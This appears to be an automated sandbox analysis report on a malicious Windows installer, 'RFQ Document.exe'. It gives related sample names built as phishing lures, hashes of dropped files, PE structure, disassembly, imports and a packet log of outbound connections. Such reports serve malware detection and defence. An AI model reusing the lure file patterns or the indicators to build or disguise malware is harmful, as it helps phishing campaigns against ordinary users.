	Payment Confirmation TT reference po.exe	Get hash	malicious	Browse	172.67.188.154
	DHL AWB# 4AB19037XXX.pdf.exe	Get hash	malicious	Browse	172.67.188.154
	aQKifdER74.exe	Get hash	malicious	Browse	172.67.188.154
	s9SWgUgyO5.exe	Get hash	malicious	Browse	172.67.188.154
	GU#U00cdA DE CARGA...exe	Get hash	malicious	Browse	172.67.188.154
	q2D8haqKv5.exe	Get hash	malicious	Browse	172.67.188.154
	TT09876545678T8R456.exe	Get hash	malicious	Browse	172.67.188.154
	Original Shipping documents.exe	Get hash	malicious	Browse	172.67.188.154
	TAX INVOICE_CCU-30408495_00942998_20180910_194738.exe	Get hash	malicious	Browse	172.67.188.154
	RHgAncmh0E.exe	Get hash	malicious	Browse	172.67.188.154
	01_extracted.exe	Get hash	malicious	Browse	172.67.188.154
	INQUIRY LIST.exe	Get hash	malicious	Browse	172.67.188.154
	YTHK21082400.exe	Get hash	malicious	Browse	172.67.188.154
	Taskmgr.exe	Get hash	malicious	Browse	172.67.188.154
	SOA.exe	Get hash	malicious	Browse	172.67.188.154
3b5074b1b5d032e5620f69f9f700ff0e	LoTvACZ5sr.exe	Get hash	malicious	Browse	149.154.167.220
	Orient-Q21-0919.exe	Get hash	malicious	Browse	149.154.167.220
	xWKIUfcQRv.exe	Get hash	malicious	Browse	149.154.167.220
	TT09876545678T8R456.exe	Get hash	malicious	Browse	149.154.167.220
	01_extracted.exe	Get hash	malicious	Browse	149.154.167.220
	VESSEL SEPC'S - WECO BULK.doc.exe	Get hash	malicious	Browse	149.154.167.220
	Order_0178PDF.exe	Get hash	malicious	Browse	149.154.167.220
	2021092600983746_pdf.exe	Get hash	malicious	Browse	149.154.167.220
	Ov3tXE6rdw.exe	Get hash	malicious	Browse	149.154.167.220
	dL7mvARUBj.exe	Get hash	malicious	Browse	149.154.167.220
	qfgYtXS4Az.exe	Get hash	malicious	Browse	149.154.167.220
	2B97860AFD98DFF5BED238E2A2CE25977B50BA5356333.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Razy.934040.7155.exe	Get hash	malicious	Browse	149.154.167.220
	J1IYv644YS.exe	Get hash	malicious	Browse	149.154.167.220
	SdNKkoXklZ.exe	Get hash	malicious	Browse	149.154.167.220
	2acrvok36Y.exe	Get hash	malicious	Browse	149.154.167.220
	DiscordDeveloperUpdate.exe	Get hash	malicious	Browse	149.154.167.220
	Exodus.exe	Get hash	malicious	Browse	149.154.167.220
	Ze7iQlRsAk.exe	Get hash	malicious	Browse	149.154.167.220
	fufx4OeSfW.exe	Get hash	malicious	Browse	149.154.167.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll Download File
Process:	C:\Users\user\Desktop\RFQ Document.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	48640
Entropy (8bit):	6.2182104873428505
Encrypted:	false
SSDEEP:	768:4ioGJiW4t1H+5f7isHkd6xEiqymUEKRnJyQuhIaySqnN6ICFunphQF2H2jIRo1ik:qGJiW47s9zHkunphQF3ZHVuIXxy5iqdY
MD5:	A4B645ED197074158D7159BD47FA101B
SHA1:	E50E421AFBA9603D2E57137FF72ACA6256C14CF1
SHA-256:	15AEF55D8E9F0D4AD435E111DC346FDEB294A77EA06B8B053424B11C3CD6FBCD
SHA-512:	3CC5E9FD59DFD4E40F691D3DE9F5B9C809F5C4A3643D03606133CC608619923F96E4058598572BC716BFAE70173C50AFDD74C32A1D258AB036F3DA847EB86155
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.3...`...`...`.o.a...`.o.a...`...`...`vS.a...`vS.a...`sS6`...`vS.a...`Rich...`........PE..L...."Ra...........!.....j...P............................................................@.........................0...H...t........................................................................................................................text....h.......j.................. ..`.bss.....................................rdata..,............n..............@..@.data....5.......6...~..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\trhfchm3wzuw7 Download File
Process:	C:\Users\user\Desktop\RFQ Document.exe
File Type:	data
Category:	dropped
Size (bytes):	290815
Entropy (8bit):	7.9769874200086415
Encrypted:	false
SSDEEP:	6144:20av42lNrOZIL8wg3SbnMuuW/AZwHhFmxLU:20olpk3SXuWEwHhFkLU
MD5:	E91C3056A10910CB57D0F7FED6E8ED81
SHA1:	DE7514EBDA3F6754CDD5E4F27772DA0CD46D0CB9
SHA-256:	2180416E95180B0F3BC245FF4660ED8B6F6C3AD6014053C043C3EE487DD3BE41
SHA-512:	BD34E93EC9AAA59E434E9F38EEC253DAABD4F2FB2A3927E5ECCC5D147946C0238578C902A3E60388F46091C83024BB8EE0A4A8DCBAF8719899043AECECBAF6B6
Malicious:	false
Reputation:	low
Preview:	%U.%...{......_.y.......p"....S-....nP'.J.d.....!...R%.'.^=V.....z.C...\9.N.:..E..{@).[.8...j.....GS.(..l...&..$...!:w.?Z.m.r.........A.7A...GdQ......'rl......q...g.y..5.-.\|l.../.N..R."..k....C%j.~..:0!....i..>......Q........b;.v9.....Z..i.....u%Q..{R.X.0.......Lp"...4.W.!..P'...d....p....NR%...^7jO...2.z.yd.aC3...)x.W....^.r.....a..,.o..ad........]..!>w.?b..D.4U...H....#.......... ..._..........Y.~.y/..wZ.B.#<O.>.@[e3...P.Q..X...7.u..+81p..Z......$.....Gs..q5....)...'3.Z..i....<`3...{....i._.....R..Lp"....S-...4nP.`.v#...b....bR%.e.^7....<2.z.yd..Ka.3..<0./=...,].r......a.:.o..adj......>]+....=@.?...D.....H$V.#.;..t=........-.Z....{&.Y...y...w2a#.#<O.>.@[e3..UP....X...7..R+.1p..Z......$...U.Gs..q5....)...'3.Z..i.....u%Q..{....i._.......Lp"....S-....nP'.J.d.....!...R%.'.^7j...<2.z.yd..KaC3...)..W....D.r.D....a*.,.o..adj.......>]..!:w.?b..D.4U...H$...#.;..t=.... ..._..........Y.~.y..w2.B.#<O.>.@[e3...P.Q..X...7..R+.1p..Z......$...U.Gs

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.851156739985387
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RFQ Document.exe
File size:	344837
MD5:	64468b2ab541687572ce6b435b41f2bd
SHA1:	893ae234d351c762ab388a7337c625e4b213da6e
SHA256:	d3ac98cf64ca2fca455b2e4f002c3381bcee699cf64bbfaa076222209f834b1a
SHA512:	317c14df6c6d1dd3b120a28743eface80474d7140515d61d0a00c326a923f56c71d7135907e2c2d5f17cba1b5746bb19ae5262cf656a098ebd94adba82cc2db8
SSDEEP:	6144:P8LxBkKFd08vwYfiEqj9LEW4AKkYMFO1UT489rSAZwghFmxGmf7qvce:BKFdLi1j9LEYKkNO1648JDwghFkFkce
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

File Icon


Icon Hash:	2f9e2e2c030b2e87

Static PE Info

General
Entrypoint:	0x40312a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b76363e9cb88bf9390860da8e50999d2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F3BE0B3B823h
push ebx
call 00007F3BE0B3E604h
cmp eax, ebx
je 00007F3BE0B3B819h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007F3BE0B3E580h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F3BE0B3B7FDh
push 0000000Dh
call 00007F3BE0B3E5D8h
push 0000000Bh
call 00007F3BE0B3E5D1h
mov dword ptr [0042EC24h], eax
call dword ptr [00407038h]
push ebx
call dword ptr [0040726Ch]
mov dword ptr [0042ECD8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429058h
call dword ptr [0040715Ch]
push 0040915Ch
push 0042E420h
call 00007F3BE0B3E204h
call dword ptr [0040710Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007F3BE0B3E1F2h
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7524	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x4228	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x27c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	False	0.670572916667	data	6.44065573436	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x12a2	0x1400	False	0.4455078125	data	5.0583287871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25d18	0x600	False	0.458984375	data	4.18773476617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2f000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x37000	0x4228	0x4400	False	0.263097426471	data	4.96300175496	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x371f0	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4293454056, next used block 4294967295	English	United States
RT_ICON	0x39798	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4292532954, next used block 4292532954	English	United States
RT_ICON	0x3a840	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x3aca8	0x100	data	English	United States
RT_DIALOG	0x3ada8	0x11c	data	English	United States
RT_DIALOG	0x3aec8	0x60	data	English	United States
RT_GROUP_ICON	0x3af28	0x30	data	English	United States
RT_MANIFEST	0x3af58	0x2cc	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll	SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 07:58:04.964962959 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 28, 2021 07:58:05.230807066 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 28, 2021 07:58:05.232337952 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 28, 2021 07:58:05.232361078 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 28, 2021 07:58:05.499475956 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 28, 2021 07:58:05.499944925 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 28, 2021 07:58:05.592782021 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 28, 2021 07:58:05.596322060 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 28, 2021 07:58:05.864909887 CEST	80	49773	132.226.8.169	192.168.2.4
Sep 28, 2021 07:58:06.013809919 CEST	49773	80	192.168.2.4	132.226.8.169
Sep 28, 2021 07:58:06.751085997 CEST	49774	443	192.168.2.4	172.67.188.154
Sep 28, 2021 07:58:06.751137972 CEST	443	49774	172.67.188.154	192.168.2.4
Sep 28, 2021 07:58:06.751235008 CEST	49774	443	192.168.2.4	172.67.188.154
Sep 28, 2021 07:58:06.814481020 CEST	49774	443	192.168.2.4	172.67.188.154
Sep 28, 2021 07:58:06.814506054 CEST	443	49774	172.67.188.154	192.168.2.4
Sep 28, 2021 07:58:06.857985020 CEST	443	49774	172.67.188.154	192.168.2.4
Sep 28, 2021 07:58:06.858104944 CEST	49774	443	192.168.2.4	172.67.188.154
Sep 28, 2021 07:58:06.862571001 CEST	49774	443	192.168.2.4	172.67.188.154
Sep 28, 2021 07:58:06.862590075 CEST	443	49774	172.67.188.154	192.168.2.4
Sep 28, 2021 07:58:06.862875938 CEST	443	49774	172.67.188.154	192.168.2.4
Sep 28, 2021 07:58:06.905411005 CEST	49774	443	192.168.2.4	172.67.188.154
Sep 28, 2021 07:58:08.310857058 CEST	49774	443	192.168.2.4	172.67.188.154
Sep 28, 2021 07:58:08.351151943 CEST	443	49774	172.67.188.154	192.168.2.4
Sep 28, 2021 07:58:08.360182047 CEST	443	49774	172.67.188.154	192.168.2.4
Sep 28, 2021 07:58:08.360292912 CEST	443	49774	172.67.188.154	192.168.2.4
Sep 28, 2021 07:58:08.360359907 CEST	49774	443	192.168.2.4	172.67.188.154
Sep 28, 2021 07:58:08.362340927 CEST	49774	443	192.168.2.4	172.67.188.154
Sep 28, 2021 07:58:09.607271910 CEST	49775	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:09.607322931 CEST	443	49775	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:09.607420921 CEST	49775	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:09.608319998 CEST	49775	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:09.608341932 CEST	443	49775	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:09.676004887 CEST	443	49775	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:09.676119089 CEST	49775	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:09.680505991 CEST	49775	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:09.680532932 CEST	443	49775	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:09.680919886 CEST	443	49775	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:09.684824944 CEST	49775	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:09.727150917 CEST	443	49775	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:09.727274895 CEST	49775	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:09.727293015 CEST	443	49775	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:09.873284101 CEST	443	49775	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:09.873378992 CEST	443	49775	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:09.873429060 CEST	49775	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:09.874667883 CEST	49775	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.067161083 CEST	49776	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.067218065 CEST	443	49776	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.067605019 CEST	49776	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.074578047 CEST	49776	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.074609995 CEST	443	49776	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.145684958 CEST	443	49776	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.152025938 CEST	49776	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.152057886 CEST	443	49776	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.155137062 CEST	49776	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.155153036 CEST	443	49776	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.256720066 CEST	443	49776	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.263416052 CEST	443	49776	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.264997959 CEST	49776	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.265022039 CEST	49776	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.267515898 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.267553091 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.273113966 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.273153067 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.273163080 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.337280989 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.344814062 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.344851971 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.345035076 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.345047951 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.447145939 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.447231054 CEST	443	49777	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.449970961 CEST	49778	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.450018883 CEST	443	49778	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.450021982 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.450061083 CEST	49777	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.450160980 CEST	49778	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.450803041 CEST	49778	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.450824022 CEST	443	49778	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.507325888 CEST	443	49778	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.511324883 CEST	49778	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.511378050 CEST	443	49778	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.511537075 CEST	49778	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.511548042 CEST	443	49778	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.619339943 CEST	443	49778	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.621088982 CEST	443	49778	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.624315977 CEST	49779	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.624375105 CEST	443	49779	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.624380112 CEST	49778	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.624412060 CEST	49778	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.625164986 CEST	49779	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.625204086 CEST	49779	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.625214100 CEST	443	49779	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.695027113 CEST	443	49779	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.699064970 CEST	49779	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.699088097 CEST	443	49779	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.700334072 CEST	49779	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.700346947 CEST	443	49779	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.807482958 CEST	443	49779	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.807571888 CEST	443	49779	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.807687998 CEST	49779	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.808712006 CEST	49779	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.810442924 CEST	49780	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.810477972 CEST	443	49780	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.811265945 CEST	49780	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.811975002 CEST	49780	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.811985970 CEST	443	49780	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.873536110 CEST	443	49780	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.892484903 CEST	49780	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.892515898 CEST	443	49780	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.892627954 CEST	49780	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:21.892638922 CEST	443	49780	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:21.998382092 CEST	443	49780	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.014259100 CEST	443	49780	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.014386892 CEST	49780	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.015985966 CEST	49780	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.017813921 CEST	49781	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.017862082 CEST	443	49781	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.018030882 CEST	49781	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.018605947 CEST	49781	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.018615961 CEST	443	49781	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.083906889 CEST	443	49781	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.087168932 CEST	49781	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.087197065 CEST	443	49781	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.087275982 CEST	49781	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.087513924 CEST	443	49781	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.233558893 CEST	443	49781	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.235013008 CEST	443	49781	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.237713099 CEST	49781	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.237756014 CEST	49781	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.243179083 CEST	49782	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.244620085 CEST	443	49782	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.244802952 CEST	49782	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.245516062 CEST	49782	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.245538950 CEST	443	49782	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.308504105 CEST	443	49782	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.319711924 CEST	49782	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.319839001 CEST	443	49782	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.319998980 CEST	49782	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.320015907 CEST	443	49782	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.418957949 CEST	443	49782	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.420542955 CEST	443	49782	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.423489094 CEST	49783	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.423527002 CEST	443	49783	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.426206112 CEST	49783	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.426213026 CEST	49782	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.426244020 CEST	49782	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.426246881 CEST	49783	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.426256895 CEST	443	49783	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.488892078 CEST	443	49783	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.499794960 CEST	49783	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.499818087 CEST	443	49783	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.510308981 CEST	49783	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.510327101 CEST	443	49783	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.615458012 CEST	443	49783	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.616270065 CEST	443	49783	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.616492033 CEST	49783	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.617559910 CEST	49783	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.619694948 CEST	49784	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.619741917 CEST	443	49784	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:22.619863033 CEST	49784	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:22.620436907 CEST	49784	443	192.168.2.4	149.154.167.220
